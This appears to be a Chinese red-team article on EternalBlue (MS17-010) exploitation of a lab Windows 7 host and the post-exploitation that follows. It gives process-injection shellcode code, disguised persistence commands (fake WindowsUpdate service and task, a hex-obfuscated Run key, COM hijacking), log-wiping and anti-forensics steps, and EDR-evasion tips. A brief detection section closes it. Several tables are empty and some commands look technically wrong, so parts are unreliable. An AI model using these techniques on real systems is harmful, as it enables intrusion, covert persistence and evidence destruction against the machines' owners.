从永恒之蓝到持久控制：一次完整的MS17-010漏洞利用与后渗透实战复盘

从永恒之蓝到持久控制：红队视角下的MS17-010漏洞全链路攻防实战

当Windows 7系统的SMB协议漏洞遭遇NSA武器库泄露的"永恒之蓝"攻击链，一场关于系统权限的争夺战就此展开。本文将还原从初始漏洞利用到建立持久化控制的完整攻击路径，重点剖析后渗透阶段的核心技术对抗。

1. 漏洞环境构建与初始突破

在虚拟化环境中搭建典型的企业内网靶场：

• 攻击机：Kali Linux 2023.1（IP: 192.168.1.100）
• 靶机：Windows 7 SP1 x64（未打MS17-010补丁，IP: 192.168.1.200）
• 内网跳板机：Windows Server 2012 R2（IP: 192.168.1.201）

漏洞验证阶段关键命令：

msf6 > use auxiliary/scanner/smb/smb_ms17_010 msf6 auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS 192.168.1.200 msf6 auxiliary(scanner/smb/smb_ms17_010) > run

当出现[+] 192.168.1.200:445 - Host is likely VULNERABLE to MS17-010!提示时，确认漏洞存在。现代红队操作中通常会先使用无害的scanner模块进行探测，避免触发IDS告警。

2. 绕过防护机制的实战技巧

面对企业环境中常见的终端防护方案，攻击者需要多维度绕过技术：

杀软对抗方案对比表：

内存注入示例：

# 使用Python实现的进程注入代码片段 import ctypes from ctypes import wintypes PROCESS_ALL_ACCESS = 0x1F0FFF kernel32 = ctypes.WinDLL('kernel32', use_last_error=True) def inject_shellcode(pid, shellcode): h_process = kernel32.OpenProcess(PROCESS_ALL_ACCESS, False, pid) remote_buffer = kernel32.VirtualAllocEx(h_process, None, len(shellcode), 0x3000, 0x40) kernel32.WriteProcessMemory(h_process, remote_buffer, shellcode, len(shellcode), None) thread_id = wintypes.DWORD() kernel32.CreateRemoteThread(h_process, None, 0, remote_buffer, None, 0, ctypes.byref(thread_id))

3. 权限维持的六种高阶手法

获得初始立足点后，攻击者会部署多种持久化机制：

1. 服务创建技术

   sc.exe create "WindowsUpdate" binPath= "C:\Windows\Temp\backdoor.exe" start= auto sc.exe config "WindowsUpdate" obj= "LocalSystem" password= ""

2. WMI事件订阅

   # 创建开机触发的事件过滤器 $filterArgs = @{ EventNamespace = 'root\cimv2' Name = 'StartupFilter' Query = "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'" QueryLanguage = 'WQL' }

3. 计划任务隐藏

   schtasks /create /tn "Microsoft\Windows\WindowsUpdate\AutomaticUpdates" /tr "C:\Windows\Temp\payload.exe" /sc onstart /ru SYSTEM

4. 注册表键值混淆

   [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run] "IME Cache"=hex(2):25,00,43,00,6f,00,6d,00,6d,00,6f,00,6e,00,50,00,72,00,6f,\ 00,67,00,72,00,61,00,6d,00,46,00,69,00,6c,00,65,00,73,00,25,00,5c,00,53,\ 00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,72,00,75,00,6e,00,64,\ 00,6c,00,6c,00,33,00,32,00,2e,00,65,00,78,00,65,00,20,00,22,00,43,00,3a,\ 00,5c,00,55,00,73,00,65,00,72,00,73,00,5c,00,50,00,75,00,62,00,6c,00,69,\ 00,63,00,5c,00,6d,00,73,00,63,00,6f,00,72,00,65,00,65,00,2e,00,64,00,6c,\ 00,6c,00,22,00,2c,00,44,00,6c,00,6c,00,52,00,65,00,67,00,69,00,73,00,74,\ 00,65,00,72,00,53,00,65,00,72,00,76,00,65,00,72

5. 登录脚本劫持

   copy payload.exe "%AppData%\Microsoft\Windows\Start Menu\Programs\Startup\" attrib +h +s "%AppData%\Microsoft\Windows\Start Menu\Programs\Startup\payload.exe"

6. COM劫持技术

   <!-- 修改CLSID注册项 --> <InProcServer32> <Default>C:\Windows\System32\evil.dll</Default> </InProcServer32>

4. 内网横向移动战术手册

4.1 凭证获取技术矩阵

4.2 横向移动工具链

graph LR A[初始立足点] --> B{凭证获取} B -->|成功| C[PsExec/WMI远程执行] B -->|失败| D[漏洞扫描] D --> E[MS08-067/MS17-010] C --> F[建立新会话] E --> F F --> G[权限提升] G --> H[域控攻击]

注意：实际攻击中建议使用Cobalt Strike的lateral_movement模块，其内置的"Jump"功能可自动化选择最佳横向路径。

5. 痕迹清理与反取证策略

专业攻击者会在撤离前执行系统状态还原：

日志清除四步法：

1. 事件日志过滤

   wevtutil cl Security /q:"*[System[(EventID=4624)]]"

2. 文件时间戳修改

   copy /b payload.exe +,,

3. 注册表操作记录清除

   reg delete HKLM\SOFTWARE\Microsoft\Tracing /f

4. 内存痕迹覆盖

   meterpreter > timestomp -v -r -z C:\Windows\Temp\*

对抗EDR的三种方法：

1. 直接内存操作绕过API监控
2. 合法进程注入（如explorer.exe）
3. 使用未文档化的NTAPI函数

6. 防御视角的检测方案

基于ATT&CK框架的检测建议：

检测规则示例（Sigma规则）：

title: Possible EternalBlue Exploit Attempt description: Detects possible MS17-010 exploit attempts references: - https://attack.mitre.org/techniques/T1210/ logsource: product: windows service: security detection: selection: EventID: 4656 ObjectName: '\Device\NamedPipe\srvsvc' condition: selection falsepositives: - Legitimate administrative activity level: high

网络层检测指标：

• SMBv1协议流量
• 异常的Named Pipe创建请求
• 非对称的TCP会话模式（攻击流量与响应比例）

在企业安全建设中，建议采用"漏洞修复+行为监控+网络隔离"的三层防护体系，特别需要关注：

1. 强制禁用SMBv1协议
2. 部署具备内存扫描能力的EDR产品
3. 对域控制器实施严格的网络访问控制

这场持续演进的攻防对抗中，红队技术不断进化，蓝队防御也需要动态调整。理解攻击链的每个环节，才是构建有效防御的基石。